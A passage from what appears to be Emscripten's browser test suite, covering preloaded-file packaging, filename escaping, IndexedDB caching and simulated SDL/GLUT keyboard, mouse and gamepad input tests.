("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
